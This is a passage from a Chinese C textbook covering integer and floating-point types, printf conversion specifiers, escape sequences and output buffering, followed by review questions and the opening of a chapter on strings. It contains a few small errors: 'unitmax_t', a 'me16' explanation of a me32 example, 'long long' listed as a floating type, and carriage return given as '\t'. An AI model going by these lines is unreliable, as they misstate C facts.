能不支持。因此,精确宽度整数类型是可选项。 如果系统不支持精确宽度整数类型怎么办?C99和C11提供了第2类别名 集合。一些类型名保证所表示的类型一定是至少有指定宽度的最小整数类 140 型。这组类型集合被称为最小宽度类型(minimum width type)。例如, int_least8_t是可容纳8位有符号整数值的类型中宽度最小的类型的一个别 名。如果某系统的最小整数类型是16位,可能不会定义int8_t类型。尽管如 此,该系统仍可使用int_least8_t类型,但可能把该类型实现为16位的整数类 型。 当然,一些程序员更关心速度而非空间。为此,C99和C11定义了一组 可使计算达到最快的类型集合。这组类型集合被称为最快最小宽度类型 (fastst minimum width type)。例如,int_fast8_t被定义为系统中对8位有符号 值而言运算最快的整数类型的别名。 另外,有些程序员需要系统的最大整数类型。为此,C99定义了最大的 有符号整数类型intmax_t,可储存任何有效的有符号整数值。类似地, unitmax_t表示最大的无符号整数类型。顺带一提,这些类型有可能比long long和unsigned long类型更大,因为C编译器除了实现标准规定的类型以外, 还可利用C语言实现其他类型。例如,一些编译器在标准引入 long long 类型 之前,已提前实现了该类型。 C99 和 C11 不仅提供可移植的类型名,还提供相应的输入和输出。例 如,printf()打印特定类型时要求与相应的转换说明匹配。如果要打印int32_t 类型的值,有些定义使用%d,而有些定义使用%ld,怎么办?C 标准针对这 一情况,提供了一些字符串宏(第 4 章中详细介绍)来显示可移植类型。例 如, inttypes.h头文件中定义了PRId32字符串宏,代表打印32位有符号值的合 适转换说明(如d或l)。程序清单3.6演示了一种可移植类型和相应转换说 明的用法。 程序清单3.6 altnames.c程序 /* altnames.c -- 可移植整数类型名 */ #include <stdio.h> #include <inttypes.h> // 支持可移植类型 141 int main(void) { int32_t me32;   // me32是一个32位有符号整型变量 me32 = 45933945; printf("First, assume int32_t is int: "); printf("me32 = %d\n", me32); printf("Next, let's not make any assumptions.\n"); printf("Instead, use a \"macro\" from inttypes.h: "); printf("me32 = %" PRId32 "\n", me32); return 0; } 该程序最后一个printf()中,参数PRId32被定义在inttypes.h中的"d"替换, 因而这条语句等价于: printf("me16 = %" "d" "\n", me16); 在C语言中,可以把多个连续的字符串组合成一个字符串,所以这条语 句又等价于: printf("me16 = %d\n", me16); 下面是该程序的输出,注意,程序中使用了\"转义序列来显示双引号: First, assume int32_t is int: me32 = 45933945 Next, let's not make any assumptions. 142 Instead, use a "macro" from inttypes.h: me32 = 45933945 篇幅有限,无法介绍扩展的所有整数类型。本节主要是为了让读者知 道,在需要时可进行这种级别的类型控制。附录B中的参考资料VI“扩展的 整数类型”介绍了完整的inttypes.h和stdint.h头文件。 注意 对C99/C11的支持 C语言发展至今,虽然ISO已发布了C11标准,但是编译器供应商对C99 的实现程度却各不相同。在本书第6版的编写过程中,一些编译器仍未实现 inttypes.h头文件及其相关功能。 3.4.6 float、double和long double 各种整数类型对大多数软件开发项目而言够用了。然而,面向金融和数 学的程序经常使用浮点数。C语言中的浮点类型有float、double和long double 类型。它们与FORTRAN和Pascal中的real类型一致。前面提到过,浮点类型 能表示包括小数在内更大范围的数。浮点数的表示类似于科学记数法(即用 小数乘以10的幂来表示数字)。该记数系统常用于表示非常大或非常小的 数。表3.3列出了一些示例。 表3.3 记数法示例 第1列是一般记数法;第2列是科学记数法;第3列是指数记数法(或称 为e记数法),这是科学记数法在计算机中的写法,e后面的数字代表10的指 数。图3.7演示了更多的浮点数写法。 C标准规定,float类型必须至少能表示6位有效数字,且取值范围至少是 10-37~10+37。前一项规定指float类型必须至少精确表示小数点后的6位有效 143 数字,如33.333333。后一项规定用于方便地表示诸如太阳质量(2.0e30千 克)、一个质子的电荷量(1.6e-19库仑)或国家债务之类的数字。通常, 系统储存一个浮点数要占用32位。其中8位用于表示指数的值和符号,剩下 24位用于表示非指数部分(也叫作尾数或有效数)及其符号。 图3.7 更多浮点数写法示例 C语言提供的另一种浮点类型是double(意为双精度)。double类型和 float类型的最小取值范围相同,但至少必须能表示10位有效数字。一般情况 下,double占用64位而不是32位。一些系统将多出的 32 位全部用来表示非 指数部分,这不仅增加了有效数字的位数(即提高了精度),而且还减少了 舍入误差。另一些系统把其中的一些位分配给指数部分,以容纳更大的指 数,从而增加了可表示数的范围。无论哪种方法,double类型的值至少有13 位有效数字,超过了标准的最低位数规定。 C语言的第3种浮点类型是long double,以满足比double类型更高的精度 要求。不过,C只保证long double类型至少与double类型的精度相同。 144 1.声明浮点型变量 浮点型变量的声明和初始化方式与整型变量相同,下面是一些例子: float noah, jonah; double trouble; float planck = 6.63e-34; long double gnp; 2.浮点型常量 在代码中,可以用多种形式书写浮点型常量。浮点型常量的基本形式 是:有符号的数字(包括小数点),后面紧跟e或E,最后是一个有符号数 表示10的指数。下面是两个有效的浮点型常量: -1.56E+12 2.87e-3 正号可以省略。可以没有小数点(如,2E5)或指数部分(如, 19.28),但是不能同时省略两者。可以省略小数部分(如,3.E16)或整数 部分(如,.45E-6),但是不能同时省略两者。下面是更多的有效浮点型常 量示例: 3.14159 .2 4e16 .8E-5 100. 145 不要在浮点型常量中间加空格:1.56 E+12(错误!) 默认情况下,编译器假定浮点型常量是double类型的精度。例如,假设 some是float类型的变量,编写下面的语句: some = 4.0 * 2.0; 通常,4.0和2.0被储存为64位的double类型,使用双精度进行乘法运 算,然后将乘积截断成float类型的宽度。这样做虽然计算精度更高,但是会 减慢程序的运行速度。 在浮点数后面加上f或F后缀可覆盖默认设置,编译器会将浮点型常量看 作float类型,如2.3f和9.11E9F。使用l或L后缀使得数字成为long double类 型,如54.3l和4.32L。注意,建议使用L后缀,因为字母l和数字1很容易混 淆。没有后缀的浮点型常量是double类型。 C99 标准添加了一种新的浮点型常量格式——用十六进制表示浮点型常 量,即在十六进制数前加上十六进制前缀(0x或0X),用p和P分别代替e和 E,用2的幂代替10的幂(即,p计数法)。如下所示: 0xa.1fp10 十六进制a等于十进制10,.1f是1/16加上15/256(十六进制f等于十进制 15),p10是210或1024。0xa.1fp10表示的值是(10 + 1/16 + 15/256)×1024(即,十进制10364.0)。 注意,并非所有的编译器都支持C99的这一特性。 3.打印浮点值 printf()函数使用%f转换说明打印十进制记数法的float和double类型浮点 数,用%e打印指数记数法的浮点数。如果系统支持十六进制格式的浮点 数,可用a和A分别代替e和E。打印long double类型要使用%Lf、%Le或%La 转换说明。给那些未在函数原型中显式说明参数类型的函数(如,printf()) 146 传递参数时,C编译器会把float类型的值自动转换成double类型。程序清单 3.7演示了这些特性。 程序清单3.7 showf_pt.c程序 /* showf_pt.c -- 以两种方式显示float类型的值 */ #include <stdio.h> int main(void) { float aboat = 32000.0; double abet = 2.14e9; long double dip = 5.32e-5; printf("%f can be written %e\n", aboat, aboat); // 下一行要求编译器支持C99或其中的相关特性 printf("And it's %a in hexadecimal, powers of 2 notation\n",  aboat); printf("%f can be written %e\n", abet, abet); printf("%Lf can be written %Le\n", dip, dip); return 0; } 该程序的输出如下,前提是编译器支持C99/C11: 32000.000000 can be written 3.200000e+04 147 And it's 0x1.f4p+14 in hexadecimal, powers of 2 notation 2140000000.000000 can be written 2.140000e+09 0.000053 can be written 5.320000e-05 该程序示例演示了默认的输出效果。下一章将介绍如何通过设置字段宽 度和小数位数来控制输出格式。 4.浮点值的上溢和下溢 假设系统的最大float类型值是3.4E38,编写如下代码: float toobig = 3.4E38 * 100.0f; printf("%e\n", toobig); 会发生什么?这是一个上溢(overflow)的示例。当计算导致数字过 大,超过当前类型能表达的范围时,就会发生上溢。这种行为在过去是未定 义的,不过现在C语言规定,在这种情况下会给toobig赋一个表示无穷大的 特定值,而且printf()显示该值为inf或infinity(或者具有无穷含义的其他内 容)。 当除以一个很小的数时,情况更为复杂。回忆一下,float类型的数以指 数和尾数部分来储存。存在这样一个数,它的指数部分是最小值,即由全部 可用位表示的最小尾数值。该数字是float类型能用全部精度表示的最小数 字。现在把它除以 2。通常,这个操作会减小指数部分,但是假设的情况 中,指数已经是最小值了。所以计算机只好把尾数部分的位向右移,空出第 1 个二进制位,并丢弃最后一个二进制数。以十进制为例,把一个有4位有 效数字的数(如,0.1234E-10)除以10,得到的结果是0.0123E-10。虽然得 到了结果,但是在计算过程中却损失了原末尾有效位上的数字。这种情况叫 作下溢(underflow)。C语言把损失了类型全精度的浮点值称为低于正常的 (subnormal)浮点值。因此,把最小的正浮点数除以 2将得到一个低于正常 的值。如果除以一个非常大的值,会导致所有的位都为0。现在,C库已提 148 供了用于检查计算是否会产生低于正常值的函数。 还有另一个特殊的浮点值NaN(not a number的缩写)。例如,给asin() 函数传递一个值,该函数将返回一个角度,该角度的正弦就是传入函数的 值。但是正弦值不能大于1,因此,如果传入的参数大于1,该函数的行为是 未定义的。在这种情况下,该函数将返回NaN值,printf()函数可将其显示为 nan、NaN或其他类似的内容。 浮点数舍入错误 给定一个数,加上1,再减去原来给定的数,结果是多少?你一定认为 是1。但是,下面的浮点运算给出了不同的答案: /* floaterr.c--演示舍入错误 */ #include <stdio.h> int main(void) { float a,b; b = 2.0e20 + 1.0; a = b - 2.0e20; printf("%f \n", a); return 0; } 该程序的输出如下: 149 得出这些奇怪答案的原因是,计算机缺少足够的小数位来完成正确的运 算。2.0e20是 2后面有20个0。如果把该数加1,那么发生变化的是第21位。 要正确运算,程序至少要储存21位数字。而float类型的数字通常只能储存按 指数比例缩小或放大的6或7位有效数字。在这种情况下,计算结果一定是错 误的。另一方面,如果把2.0e20改成2.0e4,计算结果就没问题。因为2.0e4 加1只需改变第5位上的数字,float类型的精度足够进行这样的计算。 浮点数表示法 上一个方框中列出了由于计算机使用的系统不同,一个程序有不同的输 出。原因是,根据前面介绍的知识,实现浮点数表示法的方法有多种。为了 尽可能地统一实现,电子和电气工程师协会(IEEE)为浮点数计算和表示 法开发了一套标准。现在,许多硬件浮点单元都采用该标准。2011年,该标 准被ISO/IEC/IEEE 60559:2011标准收录。该标准作为C99和C11的可选项, 符合硬件要求的平台可开启。floaterr.c程序的第3个输出示例即是支持该浮 点标准的系统显示的结果。支持C标准的编译器还包含捕获异常问题的工 具。详见附录B.5,参考资料V。 3.4.7 复数和虚数类型 许多科学和工程计算都要用到复数和虚数。C99 标准支持复数类型和虚 数类型,但是有所保留。一些独立实现,如嵌入式处理器的实现,就不需要 使用复数和虚数(VCR芯片就不需要复数)。一般而言,虚数类型都是可选 项。C11标准把整个复数软件包都作为可选项。 简而言之,C语言有3种复数类型:float_Complex、double_Complex和 long double _Complex。例如,float _Complex类型的变量应包含两个float类型 的值,分别表示复数的实部和虚部。类似地, C语言的3种虚数类型是float _Imaginary、double _Imaginary和long double _Imaginary。 150 如果包含complex.h头文件,便可用complex代替_Complex,用imaginary 代替_Imaginary,还可以用I代替-1的平方根。 为何 C 标准不直接用 complex 作为关键字来代替_Complex,而要添加 一个头文件(该头文件中把complex定义为_Complex)?因为标准委员会考 虑到,如果使用新的关键字,会导致以该关键字作为标识符的现有代码全部 失效。例如,之前的 C99,许多程序员已经使用 struct complex 定义一个结 构来表示复数或者心理学程序中的心理状况(关键字struct用于定义能储存 多个值的结构,详见第14章)。让complex成为关键字会导致之前的这些代 码出现语法错误。但是,使用struct _Complex的人很少,特别是标准使用首 字母是下划线的标识符作为预留字以后。因此,标准委员会选定_Complex 作为关键字,在不用考虑名称冲突的情况下可选择使用complex。 3.4.8 其他类型 现在已经介绍完C语言的所有基本数据类型。有些人认为这些类型实在 太多了,但有些人觉得还不够用。注意,虽然C语言没有字符串类型,但也 能很好地处理字符串。第4章将详细介绍相关内容。 C语言还有一些从基本类型衍生的其他类型,包括数组、指针、结构和 联合。尽管后面章节中会详细介绍这些类型,但是本章的程序示例中已经用 到了指针〔指针(pointer)指向变量或其他数据对象位置〕。例如,在 scanf()函数中用到的前缀&,便创建了一个指针,告诉 scanf()把数据放在何 处。 小结:基本数据类型 关键字: 基本数据类型由11个关键字组成:int、long、short、unsigned、char、 float、double、signed、_Bool、_Complex和_Imaginary。 有符号整型: 151 有符号整型可用于表示正整数和负整数。 int ——系统给定的基本整数类型。C语言规定int类型不小于16位。 short或short int ——最大的short类型整数小于或等于最大的int类型整 数。C语言规定short类型至少占16位。 long或long int ——该类型可表示的整数大于或等于最大的int类型整数。 C语言规定long类型至少占32位。 long long或long long int ——该类型可表示的整数大于或等于最大的long 类型整数。Long long类型至少占64位。 一般而言,long类型占用的内存比short类型大,int类型的宽度要么和 long类型相同,要么和short类型相同。例如,旧DOS系统的PC提供16位的 short和int,以及32位的long;Windows 95系统提供16位的short以及32位的int 和long。 无符号整型: 无符号整型只能用于表示零和正整数,因此无符号整型可表示的正整数 比有符号整型的大。在整型类型前加上关键字unsigned表明该类型是无符号 整型:unsignedint、unsigned long、unsigned short。单独的unsigned相当于 unsignedint。 字符类型: 可打印出来的符号(如A、&和+)都是字符。根据定义,char类型表示 一个字符要占用1字节内存。出于历史原因,1字节通常是8位,但是如果要 表示基本字符集,也可以是16位或更大。 char ——字符类型的关键字。有些编译器使用有符号的char,而有些则 使用无符号的char。在需要时,可在char前面加上关键字signed或unsigned来 指明具体使用哪一种类型。 152 布尔类型: 布尔值表示true和false。C语言用1表示true,0表示false。 _Bool ——布尔类型的关键字。布尔类型是无符号 int类型,所占用的空 间只要能储存0或1即可。 实浮点类型: 实浮点类型可表示正浮点数和负浮点数。 float ——系统的基本浮点类型,可精确表示至少6位有效数字。 double ——储存浮点数的范围(可能)更大,能表示比 float 类型更多 的有效数字(至少 10位,通常会更多)和更大的指数。 long long ——储存浮点数的范围(可能)比double更大,能表示比 double更多的有效数字和更大的指数。 复数和虚数浮点数: 虚数类型是可选的类型。复数的实部和虚部类型都基于实浮点类型来构 成: float _Complex double _Complex long double _Complex float _Imaginary double _Imaginary long long _Imaginary 153 小结:如何声明简单变量 1.选择需要的类型。 2.使用有效的字符给变量起一个变量名。 3.按以下格式进行声明: 类型说明符 变量名; 类型说明符由一个或多个关键字组成。下面是一些示例: int erest; unsigned short cash; 4.可以同时声明相同类型的多个变量,用逗号分隔各变量名,如下所 示: char ch, init, ans; 5.在声明的同时还可以初始化变量: float mass = 6.0E24; 3.4.9 类型大小 如何知道当前系统的指定类型的大小是多少?运行程序清单3.8,会列 出当前系统的各类型的大小。 程序清单3.8 typesize.c程序 //* typesize.c -- 打印类型大小 */ #include <stdio.h> int main(void) 154 { /* C99为类型大小提供%zd转换说明 */ printf("Type int has a size of %zd bytes.\n", sizeof(int)); printf("Type char has a size of %zd bytes.\n", sizeof(char)); printf("Type long has a size of %zd bytes.\n", sizeof(long)); printf("Type long long has a size of %zd bytes.\n", sizeof(long long)); printf("Type double has a size of %zd bytes.\n", sizeof(double)); printf("Type long double has a size of %zd bytes.\n", sizeof(long double)); return 0; } sizeof是C语言的内置运算符,以字节为单位给出指定类型的大小。C99 和C11提供%zd转换说明匹配sizeof的返回类型[2]。一些不支持C99和C11的 编译器可用%u或%lu代替%zd。 该程序的输出如下: Type int has a size of 4 bytes. Type char has a size of 1 bytes. Type long has a size of 8 bytes. 155 Type long long has a size of 8 bytes. Type double has a size of 8 bytes. Type long double has a size of 16 bytes. 该程序列出了6种类型的大小,你也可以把程序中的类型更换成感兴趣 的其他类型。注意,因为C语言定义了char类型是1字节,所以char类型的大 小一定是1字节。而在char类型为16位、double类型为64位的系统中,sizeof 给出的double是4字节。在limits.h和float.h头文件中有类型限制的相关信息 (下一章将详细介绍这两个头文件)。 顺带一提,注意该程序最后几行 printf()语句都被分为两行,只要不在 引号内部或一个单词中间断行,就可以这样写。 156 3.5 使用数据类型 编写程序时,应注意合理选择所需的变量及其类型。通常,用int或float 类型表示数字,char类型表示字符。在使用变量之前必须先声明,并选择有 意义的变量名。初始化变量应使用与变量类型匹配的常数类型。例如: int apples = 3;    /* 正确 */ int oranges = 3.0;  /* 不好的形式 */ 与Pascal相比,C在检查类型匹配方面不太严格。C编译器甚至允许二次 初始化,但在激活了较高级别警告时,会给出警告。最好不要养成这样的习 惯。 把一个类型的数值初始化给不同类型的变量时,编译器会把值转换成与 变量匹配的类型,这将导致部分数据丢失。例如,下面的初始化: int cost = 12.99;   /* 用double类型的值初始化int类型的变量 */ float pi = 3.1415926536;  /* 用double类型的值初始化float类型的变量 */ 第1个声明,cost的值是12。C编译器把浮点数转换成整数时,会直接丢 弃(截断)小数部分,而不进行四舍五入。第2个声明会损失一些精度,因 为C只保证了float类型前6位的精度。编译器对这样的初始化可能给出警告。 读者在编译程序清单3.1时可能就遇到了这种警告。 许多程序员和公司内部都有系统化的命名约定,在变量名中体现其类 型。例如,用 i_前缀表示 int类型,us_前缀表示 unsigned short 类型。这样, 一眼就能看出来 i_smart 是 int 类型的变量, us_versmart是unsigned short类型 的变量。 157 3.6 参数和陷阱 有必要再次提醒读者注意 printf()函数的用法。读者应该还记得,传递 给函数的信息被称为参数。例如,printf("Hello, pal.")函数调用有一个参 数:"Hello,pal."。双引号中的字符序列(如,"Hello,pal.")被称为字符串 (string),第4章将详细讲解相关内容。现在,关键是要理解无论双引号中 包含多少个字符和标点符号,一个字符串就是一个参数。 与此类似,scanf("%d", &weight)函数调用有两个参数:"%d"和 &weight。C语言用逗号分隔函数中的参数。printf()和scanf()函数与一般函数 不同,它们的参数个数是可变的。例如,前面的程序示例中调用过带一个、 两个,甚至三个参数的 printf()函数。程序要知道函数的参数个数才能正常 工作。printf()和scanf()函数用第1个参数表明后续有多少个参数,即第1个字 符串中的转换说明与后面的参数一一对应。例如,下面的语句有两个%d转 换说明,说明后面还有两个参数: printf("%d cats ate %d cans of tuna\n", cats, cans); 后面的确还有两个参数:cats和cans。 程序员要负责确保转换说明的数量、类型与后面参数的数量、类型相匹 配。现在,C 语言通过函数原型机制检查函数调用时参数的个数和类型是否 正确。但是,该机制对printf()和scanf()不起作用,因为这两个函数的参数个 数可变。如果参数在匹配上有问题,会出现什么情况?假设你编写了程序清 单 3.9中的程序。 程序清单3.9 badcount.c程序 /* badcount.c -- 参数错误的情况 */ #include <stdio.h> int main(void) 158 { int n = 4; int m = 5; float f = 7.0f; float g = 8.0f; printf("%d\n", n, m);  /* 参数太多 */ printf("%d %d %d\n", n); /* 参数太少 */ printf("%d %d\n", f, g); /* 值的类型不匹配 */ return 0; } XCode 4.6(OS 10.8)的输出如下: 4 4 1 -706337836 1606414344 1 Microsoft Visual Studio Express 2012(Windows 7)的输出如下: 4 4 0 0 0 1075576832 注意,用%d显示float类型的值,其值不会被转换成int类型。在不同的 159 平台下,缺少参数或参数类型不匹配导致的结果不同。 所有编译器都能顺利编译并运行该程序,但其中大部分会给出警告。的 确,有些编译器会捕获到这类问题,然而C标准对此未作要求。因此,计算 机在运行时可能不会捕获这类错误。如果程序正常运行,很难觉察出来。如 果程序没有打印出期望值或打印出意想不到的值,你才会检查 printf()函数 中的参数个数和类型是否得当。 160 3.7 转义序列示例 再来看一个程序示例,该程序使用了一些特殊的转义序列。程序清单 3.10 演示了退格(\b)、水平制表符(\t)和回车(\t)的工作方式。这些概 念在计算机使用电传打字机作为输出设备时就有了,但是它们不一定能与现 代的图形接口兼容。例如,程序清单3.10在某些Macintosh的实现中就无法正 常运行。 程序清单3.10 escape.c程序 /* escape.c -- 使用转移序列 */ #include <stdio.h> int main(void) { float salary; printf("\aEnter your desired monthly salary:"); /* 1 */ printf(" $_______\b\b\b\b\b\b\b");        /* 2 */ scanf("%f", &salary); printf("\n\t$%.2f a month is $%.2f a year.", salary, salary * 12.0);              /* 3 */ printf("\rGee!\n");                /* 4 */ return 0; } 161 3.7.1 程序运行情况 假设在系统中运行的转义序列行为与本章描述的行为一致(实际行为可 能不同。例如,XCode 4.6把\a、\b和\r显示为颠倒的问号),下面我们来分 析这个程序。 第1条printf()语句(注释中标为1)发出一声警报(因为使用了\a),然 后打印下面的内容: Enter your desired monthly salary: 因为printf()中的字符串末尾没有\n,所以光标停留在冒号后面。 第2条printf()语句在光标处接着打印,屏幕上显示的内容是: Enter your desired monthly salary: $_______ 冒号和美元符号之间有一个空格,这是因为第2条printf()语句中的字符 串以一个空格开始。7个退格字符使得光标左移7个位置,即把光标移至7个 下划线字符的前面,紧跟在美元符号后面。通常,退格不会擦除退回所经过 的字符,但有些实现是擦除的,这和本例不同。 假设键入的数据是4000.00(并按下Enter键),屏幕显示的内容应该 是: Enter your desired monthly salary: $4000.00 键入的字符替换了下划线字符。按下Enter键后,光标移至下一行的起 始处。 第3条printf()语句中的字符串以\n\t开始。换行字符使光标移至下一行起 始处。水平制表符使光标移至该行的下一个制表点,一般是第9列(但不一 定)。然后打印字符串中的其他内容。执行完该语句后,此时屏幕显示的内 容应该是: 162 Enter your desired monthly salary: $4000.00 $4000.00 a month is $48000.00 a year. 因为这条printf()语句中没有使用换行字符,所以光标停留在最后的点号 后面。 第4条printf()语句以\r开始。这使得光标回到当前行的起始处。然后打印 Gee!,接着\n使光标移至下一行的起始处。屏幕最后显示的内容应该是: Enter your desired monthly salary: $4000.00 Gee! $4000.00 a month is $48000.00 a year. 3.7.2 刷新输出 printf()何时把输出发送到屏幕上?最初,printf()语句把输出发送到一个 叫作缓冲区(buffer)的中间存储区域,然后缓冲区中的内容再不断被发送 到屏幕上。C 标准明确规定了何时把缓冲区中的内容发送到屏幕:当缓冲区 满、遇到换行字符或需要输入的时候(从缓冲区把数据发送到屏幕或文件被 称为刷新缓冲区)。例如,前两个 printf()语句既没有填满缓冲区,也没有 换行符,但是下一条 scanf()语句要求用户输入,这迫使printf()的输出被发送 到屏幕上。 旧式编译器遇到scanf()也不会强行刷新缓冲区,程序会停在那里不显示 任何提示内容,等待用户输入数据。在这种情况下,可以使用换行字符刷新 缓冲区。代码应改为: printf("Enter your desired monthly salary:\n"); scanf("%f", &salary); 无论接下来的输入是否能刷新缓冲区,代码都会正常运行。这将导致光 标移至下一行起始处,用户无法在提示内容同一行输入数据。还有一种刷新 163 缓冲区的方法是使用fflush()函数,详见第13章。 164 3.8 关键概念 C语言提供了大量的数值类型,目的是为程序员提供方便。那以整数类 型为例,C认为一种整型不够,提供了有符号、无符号,以及大小不同的整 型,以满足不同程序的需求。 计算机中的浮点数和整数在本质上不同,其存储方式和运算过程有很大 区别。即使两个32位存储单元储存的位组合完全相同,但是一个解释为float 类型,另一个解释为long类型,这两个相同的位组合表示的值也完全不同。 例如,在PC中,假设一个位组合表示float类型的数256.0,如果将其解释为 long类型,得到的值是113246208。C语言允许编写混合数据类型的表达式, 但是会进行自动类型转换,以便在实际运算时统一使用一种类型。 计算机在内存中用数值编码来表示字符。美国最常用的是ASCII码,除 此之外C也支持其他编码。字符常量是计算机系统使用的数值编码的符号表 示,它表示为单引号括起来的字符,如'A'。 165 3.9 本章小结 C 有多种的数据类型。基本数据类型分为两大类:整数类型和浮点数类 型。通过为类型分配的储存量以及是有符号还是无符号,区分不同的整数类 型。最小的整数类型是char,因实现不同,可以是有符号的char或无符号的 char,即unsigned char或signed char。但是,通常用char类型表示小整数时才 这样显示说明。其他整数类型有short、int、long和long long类型。C规定,后 面的类型不能小于前面的类型。上述都是有符号类型,但也可以使用 unsigned关键字创建相应的无符号类型:unsigned short、unsigned int、 unsigned long和unsigned long long。或者,在类型名前加上signed修饰符显式 表明该类型是有符号类型。最后,_Bool类型是一种无符号类型,可储存0或 1,分别代表false和true。 浮点类型有3种:float、double和C90新增的long double。后面的类型应 大于或等于前面的类型。有些实现可选择支持复数类型和虚数类型,通过关 键字_Complex和_Imaginary与浮点类型的关键字组合(如,double _Complex 类型和float _Imaginary类型)来表示这些类型。 整数可以表示为十进制、八进制或十六进制。0前缀表示八进制数,0x 或0X前缀表示十六进制数。例如,32、040、0x20分别以十进制、八进制、 十六进制表示同一个值。l或L前缀表明该值是long类型, ll或LL前缀表明该 值是long long类型。 在C语言中,直接表示一个字符常量的方法是:把该字符用单引号括起 来,如'Q'、'8'和'$'。C语言的转义序列(如,'\n')表示某些非打印字符。另 外,还可以在八进制或十六进制数前加上一个反斜杠(如,'\007'),表示 ASCII码中的一个字符。 浮点数可写成固定小数点的形式(如,9393.912)或指数形式(如, 7.38E10)。C99和C11提供了第3种指数表示法,即用十六进制数和2的幂来 表示(如,0xa.1fp10)。 166 printf()函数根据转换说明打印各种类型的值。转换说明最简单的形式由 一个百分号(%)和一个转换字符组成,如%d或%f。 167 3.10 复习题 复习题的参考答案在附录A中。 1.指出下面各种数据使用的合适数据类型(有些可使用多种数据类 型): a.East Simpleton的人口 b.DVD影碟的价格 c.本章出现次数最多的字母 d.本章出现次数最多的字母次数 2.在什么情况下要用long类型的变量代替int类型的变量? 3.使用哪些可移植的数据类型可以获得32位有符号整数?选择的理由是 什么? 4.指出下列常量的类型和含义(如果有的话): a.'\b' b.1066 c.99.44 d.0XAA e.2.0e30 5.Dottie Cawm编写了一个程序,请找出程序中的错误。 include <stdio.h> 168 main ( float g; h; float tax, rate; g = e21; tax = rate*g; ) 6.写出下列常量在声明中使用的数据类型和在printf()中对应的转换说 明: 7.写出下列常量在声明中使用的数据类型和在printf()中对应的转换说明 (假设int为16位): 169 8.假设程序的开头有下列声明: int imate = 2; long shot = 53456; char grade = 'A'; float log = 2.71828; 把下面printf()语句中的转换字符补充完整: printf("The odds against the %__ were %__ to 1.\n",  imate, shot); printf("A score of %__ is not an %__ grade.\n", log,  grade); 9.假设ch是char类型的变量。分别使用转义序列、十进制值、八进制字 符常量和十六进制字符常量把回车字符赋给ch(假设使用ASCII编码值)。 10.修正下面的程序(在C中,/表示除以)。 void main(int) / this program is perfect / { cows, legs integer; 170 printf("How many cow legs did you count?\n); scanf("%c", legs); cows = legs / 4; printf("That implies there are %f cows.\n", cows) } 11.指出下列转义序列的含义: a.\n b.\\ c.\" d.\t 171 3.11 编程练习 1.通过试验(即编写带有此类问题的程序)观察系统如何处理整数上 溢、浮点数上溢和浮点数下溢的情况。 2.编写一个程序,要求提示输入一个ASCII码值(如,66),然后打印 输入的字符。 3.编写一个程序,发出一声警报,然后打印下面的文本: Startled by the sudden sound, Sally shouted, "By the Great Pumpkin, what was that!" 4.编写一个程序,读取一个浮点数,先打印成小数点形式,再打印成指 数形式。然后,如果系统支持,再打印成p记数法(即十六进制记数法)。 按以下格式输出(实际显示的指数位数因系统而异): Enter a floating-point value: 64.25 fixed-point notation: 64.250000 exponential notation: 6.425000e+01 p notation: 0x1.01p+6 5.一年大约有3.156×107秒。编写一个程序,提示用户输入年龄,然后显 示该年龄对应的秒数。 6.1个水分子的质量约为3.0×10−23克。1夸脱水大约是950克。编写一个 程序,提示用户输入水的夸脱数,并显示水分子的数量。 7.1英寸相当于2.54厘米。编写一个程序,提示用户输入身高(/英 寸),然后以厘米为单位显示身高。 172 8.在美国的体积测量系统中,1品脱等于2杯,1杯等于8盎司,1盎司等 于2大汤勺,1大汤勺等于3茶勺。编写一个程序,提示用户输入杯数,并以 品脱、盎司、汤勺、茶勺为单位显示等价容量。思考对于该程序,为何使用 浮点类型比整数类型更合适? [1].欧美日常使用的度量衡单位是常衡盎司(avoirdupois ounce),而欧美黄 金市场上使用的黄金交易计量单位是金衡盎司(troy ounce)。国际黄金市 场上的报价,其单位“盎司”都指的是黄金盎司。常衡盎司属英制计量单位, 做重量单位时也称为英两。相关换算参考如下:1常衡盎司 = 28.350克,1金 衡盎司 = 31.104克,16常衡盎司 = 1磅。该程序的单位转换思路是:把磅换 算成金衡盎司,即28.350÷31.104×16=14.5833。——译者注 [2].即,size_t类型。——译者注 173 第4章 字符串和格式化输入/输出 本章介绍以下内容: 函数:strlen() 关键字:const 字符串 如何创建、存储字符串 如何使用strlen()函数获取字符串的长度 用C预处理器指令#define和ANSIC的const修饰符创建符号常量 本章重点介绍输入和输出。与程序交互和使用字符串可以编写个性化的 程序,本章将详细介绍C语言的两个输入/输出函数:printf()和scanf()。学会 使用这两个函数,不仅能与用户交互,还可根据个人喜好和任务要求格式化 输出。最后,简要介绍一个重要的工具——C预处理器指令,并学习如何定 义、使用符号常量。 174 4.1 前导程序 与前两章一样,本章以一个简单的程序开始。程序清单4.1与用户进行 简单的交互。为了使程序的形式灵活多样,代码中使用了新的注释风格。 程序清单4.1 talkback.c程序 // talkback.c -- 演示与用户交互 #include <stdio.h> #include <string.h>   // 提供strlen()函数的原型 #define DENSITY 62.4  // 人体密度(单位:磅/立方英尺) int main() { float weight, volume; int size, letters; char name[40];    // name是一个可容纳40个字符的数组 printf("Hi! What's your first name?\n"); scanf("%s", name); printf("%s, what's your weight in pounds?\n", name); scanf("%f", &weight); size = sizeof name; letters = strlen(name); 175 volume = weight / DENSITY; printf("Well, %s, your volume is %2.2f cubic feet.\n", name, volume); printf("Also, your first name has %d letters,\n", letters); printf("and we have %d bytes to store it.\n", size); return 0; } 运行talkback.c程序,输入结果如下: Hi! What's your first name? Christine Christine, what's your weight in pounds? 154 Well, Christine, your volume is 2.47 cubic feet. Also, your first name has 9 letters, and we have 40 bytes to store it. 该程序包含以下新特性。 用数组(array)储存字符串(character string)。在该程序中,用户输 入的名被储存在数组中,该数组占用内存中40个连续的字节,每个字节储存 一个字符值。 176 使用%s转换说明来处理字符串的输入和输出。注意,在scanf()中, name没有&前缀,而weight有(稍后解释,&weight和name都是地址)。 用C预处理器把字符常量DENSITY定义为62.4。 用C函数strlen()获取字符串的长度。 对于BASIC的输入/输出而言,C的输入/输出看上去有些复杂。不过, 复杂换来的是程序的高效和方便控制输入/输出。而且,一旦熟悉用法后, 会发现它很简单。 177 4.2 字符串简介 字符串(character string)是一个或多个字符的序列,如下所示: "Zing went the strings of my heart!" 双引号不是字符串的一部分。双引号仅告知编译器它括起来的是字符 串,正如单引号用于标识单个字符一样。 4.2.1 char类型数组和null字符 C语言没有专门用于储存字符串的变量类型,字符串都被储存在char类 型的数组中。数组由连续的存储单元组成,字符串中的字符被储存在相邻的 存储单元中,每个单元储存一个字符(见图4.1)。 图4.1 数组中的字符串 注意图4.1中数组末尾位置的字符\0。这是空字符(null character),C 